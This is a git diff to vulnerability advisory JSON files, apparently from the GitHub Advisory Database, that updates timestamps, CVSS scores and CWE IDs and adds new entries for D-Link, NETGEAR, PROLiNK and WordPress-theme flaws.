a/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json +++ b/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w8p3-q4q6-xq79", - "modified": "2024-06-03T18:53:36Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T22:29:01Z", "aliases": [ "CVE-2019-1181" ], "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1182, CVE-2019-1222, CVE-2019-1226.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json b/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json index 8a4bbd2b74820..131c4e493ca1a 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json +++ b/advisories/unreviewed/2022/05/GHSA-wqw7-2chg-rhcv/GHSA-wqw7-2chg-rhcv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wqw7-2chg-rhcv", - "modified": "2022-05-24T16:53:28Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:28Z", "aliases": [ "CVE-2019-1146" ], "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1147, CVE-2019-1155, CVE-2019-1156, CVE-2019-1157.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json b/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json index a1e265014bee1..af59d7b994ef5 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json +++ b/advisories/unreviewed/2022/05/GHSA-xhpj-r5xj-f4j3/GHSA-xhpj-r5xj-f4j3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xhpj-r5xj-f4j3", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1153" ], "details": "An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1078, CVE-2019-1148.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-125" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json b/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json index 20dcdc81284bd..8f6fdbcf6f840 100644 --- a/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json +++ b/advisories/unreviewed/2023/08/GHSA-g5c7-69g3-565r/GHSA-g5c7-69g3-565r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g5c7-69g3-565r", - "modified": "2024-09-19T00:31:32Z", + "modified": "2026-02-20T21:31:14Z", "published": "2023-08-31T03:30:36Z", "aliases": [ "CVE-2023-4162" diff --git a/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json b/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json index 1466b1e014fe2..b42d0bcc38526 100644 --- a/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json +++ b/advisories/unreviewed/2024/12/GHSA-ghpw-cph8-v3rm/GHSA-ghpw-cph8-v3rm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ghpw-cph8-v3rm", - "modified": "2025-03-18T00:30:36Z", + "modified": "2026-02-20T21:31:15Z", "published": "2024-12-18T18:30:52Z", "aliases": [ "CVE-2024-55089" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55089" }, + { + "type": "WEB", + "url": "https://github.com/rhymix/rhymix/commit/464985b1ef382cc8cf852e9b028a960aa58b40c3" + }, + { + "type": "WEB", + "url": "https://rhymix.org/news/1909005" + }, { "type": "WEB", "url": "https://tasteful-stamp-da4.notion.site/CVE-2024-55089-15b1e0f227cb8064a563c697709b7530?pvs=73" @@ -26,7 +34,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-352" + "CWE-352", + "CWE-918" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json b/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json index 96aae5bc0722d..2ca0d5403f713 100644 --- a/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json +++ b/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qqrg-hpxx-mmvw", - "modified": "2025-12-18T06:30:13Z", + "modified": "2026-02-20T21:31:16Z", "published": "2025-12-18T06:30:13Z", "aliases": [ "CVE-2025-68461" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-68461" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json b/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json index 3abf87ad4c9f4..66545575a40d5 100644 --- a/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json +++ b/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2vf2-f656-c2mm", - "modified": "2026-01-13T18:31:07Z", + "modified": "2026-02-20T21:31:16Z", "published": "2026-01-13T18:31:07Z", "aliases": [ "CVE-2026-0406" ], "details": "An insufficient input validation vulnerability in the NETGEAR XR1000v2 \nallows attackers connected to the router's LAN to execute OS command \ninjections.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json b/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json index 3916424fa241a..419db72d2cd72 100644 --- a/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json +++ b/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-52xc-q9g5-mc6m", - "modified": "2026-01-13T18:31:07Z", + "modified": "2026-02-20T21:31:16Z", "published": "2026-01-13T18:31:07Z", "aliases": [ "CVE-2026-0403" ], "details": "An insufficient input validation vulnerability in NETGEAR Orbi routers \nallows attackers connected to the router's LAN to execute OS command \ninjections.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json b/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json index 50d225a18688a..530a5dd20dfd8 100644 --- a/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json +++ b/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-56jh-3q9p-9x3q", - "modified": "2026-01-13T18:31:07Z", + "modified": "2026-02-20T21:31:17Z", "published": "2026-01-13T18:31:07Z", "aliases": [ "CVE-2026-0407" ], "details": "An insufficient authentication vulnerability in NETGEAR WiFi range \nextenders allows a network adjacent attacker with WiFi authentication or\n a physical Ethernet port connection to bypass the authentication \nprocess and access the admin panel.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json b/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json index f7aa82b809c31..36b512ff97c8b 100644 --- a/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json +++ b/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rhrj-763h-99fq", - "modified": "2026-01-13T18:31:07Z", + "modified": "2026-02-20T21:31:17Z", "published": "2026-01-13T18:31:07Z", "aliases": [ "CVE-2026-0408" ], "details": "A path traversal vulnerability in NETGEAR WiFi range extenders allows\n an attacker with LAN authentication to access the router's IP and \nreview the contents of the dynamically generated webproc file, which \nrecords the username and password submitted to the router GUI.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json index 0fd2b97c7be9c..4a2046d7f94a9 100644 --- a/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json +++ b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-343f-9rcg-8p42", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-24941" ], "details": "Missing Authorization vulnerability in wpjobportal WP Job Portal wp-job-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Job Portal: from n/a through <= 2.4.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:38Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json b/advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json new file mode 100644 index 0000000000000..e59dcf9a0be20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3685-fgwv-ffhc", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2854" + ], + "details": "A flaw has been found in D-Link DWR-M960 1.01.07. This impacts the function sub_4611CC of the file /boafrm/formNtp of the component NTP Configuration Endpoint. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2854" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/11" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347093" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347093" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754457" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json b/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json index c25386e35d60d..34bc4cf90133d 100644 --- a/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json +++ b/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3822-8jq8-pqhh", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-20T21:31:21Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15562" ], "details": "The server API endpoint /report/internet/urls reflects received data into the HTML response without applying proper encoding or filtering. This allows an attacker to execute arbitrary JavaScript in the victim's browser if the victim opens a URL prepared by the attacker.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:56Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json index 1df04f7de316b..35b53ce9ffe1a 100644 --- a/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json +++ b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3g7r-h8fj-xc5g", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22378" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Blabber blabber allows PHP Local File Inclusion.This issue affects Blabber: from n/a through <= 1.7.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:37Z" diff --git a/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json index 0d4372d3c8b9d..85d0a52698109 100644 --- a/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json +++ b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-43ww-vg8r-97hv", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22374" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Zio Alberto zioalberto allows PHP Local File Inclusion.This issue affects Zio Alberto: from n/a through <= 1.2.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json index 5093e5f59ce89..142ad8603f80a 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json +++ b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json b/advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json new file mode 100644 index 0000000000000..9c3afc7d0e8a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mq8-87c9-qfhc", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2857" + ], + "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_423E00 of the file /boafrm/formPortFw of the component Port Forwarding Configuration Endpoint. This manipulation of the argument submit-url causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2857" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/14" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347096" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347096" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754476" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T21:19:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json b/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json index ae2acc36b4efb..d1011829c1247 100644 --- a/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json +++ b/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5vrw-6f4h-227q", - "modified": "2026-02-11T03:30:18Z", + "modified": "2026-02-20T21:31:20Z", "published": "2026-02-11T03:30:18Z", "aliases": [ "CVE-2026-1571" ], "details": "User-controlled input is reflected into the HTML output without proper encoding on TP-Link Archer C60 v3, allowing arbitrary JavaScript execution via a crafted URL. An attacker could run script in the device web UI context, potentially enabling credential theft, session hijacking, or unintended actions if a privileged user is targeted.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json index 12920820315dd..ff14490e4866b 100644 --- a/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json +++ b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json index fcd99fa694ca1..56f024acf0f1a 100644 --- a/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json +++ b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6262-6vhm-9x8v", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24948" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Reflector reflector-plugins allows Reflected XSS.This issue affects Reflector: from n/a through <= 1.2.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json index 1ba5359ab6e42..fe0b21585aa6c 100644 --- a/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json +++ b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-62hw-x3qq-c7vv", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:40Z", "aliases": [ "CVE-2026-27506" ], "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user profile update workflow (user_settings.php submitting to admin/update_user.php). Authenticated users can store malicious HTML/JavaScript in fields such as Firstname, lastname, email, and image_url, which are later rendered without adequate output encoding in the administrator interface (admin/users.php), resulting in JavaScript execution in an administrator's browser when the affected page is viewed.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json b/advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json new file mode 100644 index 0000000000000..cd89edf42ca1a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-68g8-2724-hq79", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T21:31:23Z", + "aliases": [ + "CVE-2021-35402" + ], + "details": "PROLiNK PRC2402M 20190909 before 2021-06-13 allows live_api.cgi?page=satellite_list OS command injection via shell metacharacters in the ip parameter (for satellite_status).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35402" + }, + { + "type": "WEB", + "url": "https://starlabs.sg/advisories/21/21-35402" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T19:23:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json index 3b2a346b5c526..4844c455e9f1e 100644 --- a/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json +++ 